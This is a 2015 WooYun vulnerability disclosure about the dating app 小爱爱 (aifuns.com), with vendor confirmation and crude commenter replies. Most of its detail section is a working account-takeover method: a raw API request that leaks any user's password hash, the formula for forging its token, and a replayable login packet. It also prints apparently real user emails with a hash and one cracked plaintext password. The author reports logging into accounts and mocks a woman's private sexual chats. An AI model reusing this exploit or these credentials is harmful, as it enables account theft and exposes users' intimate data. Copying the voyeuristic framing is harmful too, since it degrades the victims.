当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141638

漏洞标题:小爱爱客户端设计缺陷查询任意用户密码/登陆任意用户(妹子们哥来啦)

相关厂商:aifuns.com

漏洞作者: 北京方便面

提交时间:2015-09-17 14:35

修复时间:2015-12-16 15:02

公开时间:2015-12-16 15:02

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-20: 细节向第三方安全合作伙伴开放
2015-11-11: 细节向核心白帽子及相关领域专家公开
2015-11-21: 细节向普通白帽子公开
2015-12-01: 细节向实习白帽子公开
2015-12-16: 细节向公众公开

简要描述:

小爱爱客户端设计缺陷查询任意用户密码/登陆任意用户(妹子们哥来啦)
我靠 这妹子几乎每天都要!

详细说明:

POST /api/v2/user/selectuser HTTP/1.1
Host: api.aifuns.com:80
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: %E5%B0%8F%E7%88%B1%E7%88%B1/31 CFNetwork/711.3.18 Darwin/14.0.0
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Length: 664
data=%7B%0A%20%20%22appver%22%20:%20%2231%22,%0A%20%20%22channel%22%20:%20%22appstore%22,%0A%20%20%22lang%22%20:%20%22zh-Hans%22,%0A%20%20%22tk%22%20:%20%22fe42ee7f808ecd625e5458c03bcb6f7e%22,%0A%20%20%22platform%22%20:%20%221%22,%0A%20%20%22ver%22%20:%20%221.0%22,%0A%20%20%22clientid%22%20:%20%2218714F45-788F-4458-81EB-81222A71A061%22,%0A%20%20%22token%22%20:%20%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOnsiY2xpZW50SWQiOiIxODcxNEY0NS03ODhGLTQ0NTgtODFFQi04MTIyMkE3MUEwNjEiLCJ1c2VySWQiOiI5MjU0MiJ9LCJpdWEiOjE0NDQ5ODkzNjJ9.E12htrjvdcZkQZG62mTZ29PlfYZKPgZeWcE9ZY5PcXE%22,%0A%20%20%22appid%22%20:%20%221%22,%0A%20%20%22aiainumlist%22%20:%20%221051136%22%0A%7D


发现此请求会获取到用户的密码
aiainumlist控制要获取密码的用户,这里还有个tk我们需要知道

9YR8%D`Y3$U3{U)NP]QWU6A.jpg


{"clientid":"8b821bf6-3267-34c0-8f47-fddf46f257aa","platform":"2","username":"***9225@qq.com","appid":"1","ver":"1.0","tk":"fecc3ff0058c206e2675f7ecbaae04bd","password":"d932e0bfa55edfc64ed836550f867a0b","lang":"zh","appver":"21"}
tk=md5(1218b821bf6-3267-34c0-8f47-fddf46f257aazhd932e0bfa55edfc64ed836550f867a0b2***9225@qq.com1.0)


更改aiainumlist 生成对应的tk 发送请求即可获取任意用户的密码
感谢瘦蛟舞的帮助
后来发现了一个更简单的方式:
步骤:
1、设置好抓包代理,给想要知道密码的账号发任意消息
2、返回消息菜单,在【聊天信息】列表里向下滑刷新列表
3、此时在找包工具内会发现【POST /api/v2/user/selectuser】的请求,Response内容就包含对方的账号密码

IMG_0704.PNG


IMG_0703.PNG


屏幕快照 2015-09-16 下午6.30.53.png


官方的账号密码
aifunsnum000@aifuns.com
ef999040a889560c7cc386a11ad89752
分析客户端可知密码的加密key是app123 固定的 密码简单的可以解出来
zxf19900302@126.com——a12345
但密码复杂的就无法破解了
但是我们测试发现登陆包POST内容如下:

{
  "appver" : "31",
  "password" : "c35c8bbf037eddeef20bed5083f0762f",
  "lang" : "zh-Hans",
  "channel" : "appstore",
  "platform" : "1",
  "ver" : "1.0",
  "tk" : "e44ac5d9a0b693177204621c33f2ea4e",
  "username" : "2395786549@qq.con",
  "clientid" : "18714F45-788F-4458-81EB-81222A71A061",
  "appid" : "1"
}


password就是md5(密码+key)
所以获取到的密码 我们可以直接用来改包登陆
我们以官方账号和小爱爱里比较活跃的妹子为例:
官方账号:

IMG_0710.PNG


IMG_0711.PNG


禽兽们 官方账号都不放过

IMG_0712.PNG


IMG_0713.PNG


IMG_0714.PNG


大胸妹:

IMG_0709.PNG


妹子太活跃了,测试过程中就有好几个人找她

IMG_0705.PNG


IMG_0706.PNG


IMG_0707.PNG


我靠 这妹子几乎每天都要!

IMG_0708.PNG

漏洞证明:

修复方案:

版权声明:转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-17 15:00

厂商回复:

感谢作者发现的问题,我们这2天也发现了这些问题,已经在着手进行处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-16 18:54 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    贵圈为何如此之乱

  2. 2015-09-16 19:06 | wefgod ( 核心白帽子 | Rank:1817 漏洞数:180 | 力不从心)

    可以哦

  3. 2015-09-16 20:27 | Coody 认证白帽子 ( 核心白帽子 | Rank:1707 漏洞数:203 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    不错哦~

  4. 2015-09-17 09:24 | niliu 认证白帽子 ( 核心白帽子 | Rank:1559 漏洞数:211 | 逆流而上)

    每天都要干嘛

  5. 2015-09-17 14:47 | 沧浪浪拔出保健 ( 普通白帽子 | Rank:209 漏洞数:19 | @互联网的那点事)

    感觉要沉迷这app怎么办

  6. 2015-09-23 08:49 | 浮世浮城 ( 普通白帽子 | Rank:692 漏洞数:136 | 我存于这俗世烟火的浮世,我爱这时光倒影的...)

    在同性交友网站乌云推广这种APP 你认为会有人下载么 嗯? 对了 给个官方的下载链接 让老夫会会这些夜夜都要的女湿主

  7. 2015-09-24 10:08 | 以梦为马 ( 路人 | Rank:0 漏洞数:1 | 一个和谐的低调主义者。)

    - -妈蛋,作为已出柜的孩子,快点给我一个下载链接,我要观摩一番。安慰他们一下。

  8. 2015-12-16 15:10 | Fire ant ( 实习白帽子 | Rank:83 漏洞数:28 | 他们回来了................)

    虽然我一直以为我快弯了。。但是瞬间我就直如擎天柱

  9. 2015-12-16 15:28 | 这只猪 ( 路人 | Rank:5 漏洞数:2 | 南无阿弥陀佛!)

    very good, 老夫竟然知道出了陌陌外的神器!